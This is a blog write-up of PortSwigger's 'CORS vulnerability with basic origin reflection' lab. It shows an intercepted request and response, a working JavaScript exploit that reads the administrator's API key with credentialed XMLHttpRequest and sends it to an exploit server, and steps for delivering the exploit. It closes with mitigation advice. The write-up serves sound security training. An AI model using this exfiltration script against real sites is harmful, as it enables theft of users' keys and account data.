Solving Portswigger Labs: CORS vulnerability with basic origin reflection

RyangombeRyangombe
4 min read

Introduction

Cross-Origin Resource Sharing (CORS) vulnerabilities represent a significant security risk when misconfigured. In this walkthrough, we'll explore PortSwigger's "CORS vulnerability with basic origin reflection" lab, demonstrating how improper CORS implementation can lead to sensitive data exposure.

Understanding CORS and the Vulnerability

What is CORS?

CORS is a browser security mechanism that allows web pages to make requests to different domains than the one serving the page. It uses HTTP headers to tell browsers whether specific cross-origin requests should be allowed.

The Vulnerability

The target application has a critical CORS misconfiguration: it trusts all origins by reflecting any origin header back in the Access-Control-Allow-Origin response header, combined with Access-Control-Allow-Credentials: true. This combination allows any malicious website to make authenticated requests and read sensitive responses.

Lab Setup and Initial Analysis

Lab Objective: Craft JavaScript that uses CORS to retrieve the administrator's API key and upload it to your exploit server.

Credentials: wiener:peter

Step 1: Confirming the Vulnerability

After logging in with the provided credentials, I tested the CORS configuration by intercepting the request to /accountDetails and adding a custom Origin header:

GET /accountDetails HTTP/2
Host: 0a16002b041df12c80c2039b00a40038.web-security-academy.net
Cookie: session=lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO
Origin: https://attacker.com

The server's response confirmed the vulnerability:

HTTP/2 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8

{
  "username": "wiener",
  "email": "",
  "apikey": "AQqU5vW28FVytBfqUwmm6ip5EfOcGLbX",
  "sessions": [
    "lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO"
  ]
}

Key Observations:

  • The Origin header is reflected exactly in Access-Control-Allow-Origin

  • Access-Control-Allow-Credentials: true allows cookies to be included

  • The response contains sensitive data including the API key

Crafting the Exploit

Step 2: JavaScript Exploit Development

The exploit leverages the CORS misconfiguration to steal the administrator's API key:

// CORS exploit to retrieve administrator's API key
var req = new XMLHttpRequest();

req.onload = function() {
    // Parse the response to extract the API key
    var response = JSON.parse(this.responseText);
    var apikey = response.apikey;

    // Send the API key to your exploit server
    var exfiltrate = new XMLHttpRequest();
    exfiltrate.open("GET", "https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/exploit?apikey=" + apikey, true);
    exfiltrate.send();
};

// Make CORS request to the vulnerable endpoint
req.open("GET", "https://0a16002b041df12c80c2039b00a40038.web-security-academy.net/accountDetails", true);
req.withCredentials = true;  // Important: include cookies in the request
req.send();

Exploit Breakdown:

  1. XMLHttpRequest Creation: Creates a new request object

  2. Credential Inclusion: withCredentials: true ensures session cookies are sent

  3. Response Handling: Parses JSON response and extracts the API key

  4. Data Exfiltration: Sends the stolen API key to the attacker-controlled server

Step 3: Deploying the Exploit

  1. Navigate to the exploit server: https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/

  2. Paste the JavaScript code into the body section (wrapped in <script> tags)

  3. Click "Store" to save the exploit payload

  4. Click "Deliver exploit to victim" to trigger the attack

  5. Click "Access server log"

  6. Check the request that was made by the victim to the exploit server that looks like this:

     10.0.4.241      2025-07-23 08:49:53 +0000 "GET /exploit?apikey=i3NCPLRccl0ZXOKFX5Sb3ErmkkZkf6VR HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
    
  7. Submit solution

Why This Attack Works

Technical Analysis

The attack succeeds due to three critical factors:

  1. Origin Reflection: The server reflects any origin without validation

  2. Credential Support: Access-Control-Allow-Credentials: true allows authenticated requests

  3. Sensitive Data Exposure: The endpoint returns sensitive information in the response

When the administrator visits the malicious page:

  1. Their browser executes the malicious JavaScript

  2. The script makes a CORS request to /accountDetails with the admin's session cookies

  3. The server processes the request as if it came from the admin

  4. The response containing the API key is readable by the malicious script

  5. The API key is exfiltrated to the attacker's server

Prevention and Mitigation

Secure CORS Configuration

To prevent this vulnerability:

  1. Whitelist Specific Origins: Only allow trusted domains

     Access-Control-Allow-Origin: https://trusted-domain.com
    
  2. Avoid Wildcards with Credentials: Never combine * with Access-Control-Allow-Credentials: true

  3. Validate Origins Properly: Implement server-side origin validation

     const allowedOrigins = ['https://app.company.com', 'https://admin.company.com'];
     if (allowedOrigins.includes(request.headers.origin)) {
         response.setHeader('Access-Control-Allow-Origin', request.headers.origin);
     }
    
  4. Minimize Credential Exposure: Only set Access-Control-Allow-Credentials: true when absolutely necessary

Conclusion

This lab demonstrates how a simple CORS misconfiguration can lead to complete compromise of user data. The combination of origin reflection and credential support creates a perfect storm for cross-origin attacks. Security practitioners should regularly audit CORS configurations and implement strict origin validation to prevent such vulnerabilities.

Key Takeaways:

  • CORS misconfigurations can be as dangerous as traditional XSS vulnerabilities

  • Proper origin validation is critical for secure CORS implementation

  • Never trust user-supplied origin headers without validation

  • Regular security testing should include CORS configuration reviews

Understanding and preventing CORS vulnerabilities is essential for modern web application security, as APIs and cross-origin communications become increasingly prevalent in web development.

0
Subscribe to my newsletter

Read articles from Ryangombe directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Ryangombe
Ryangombe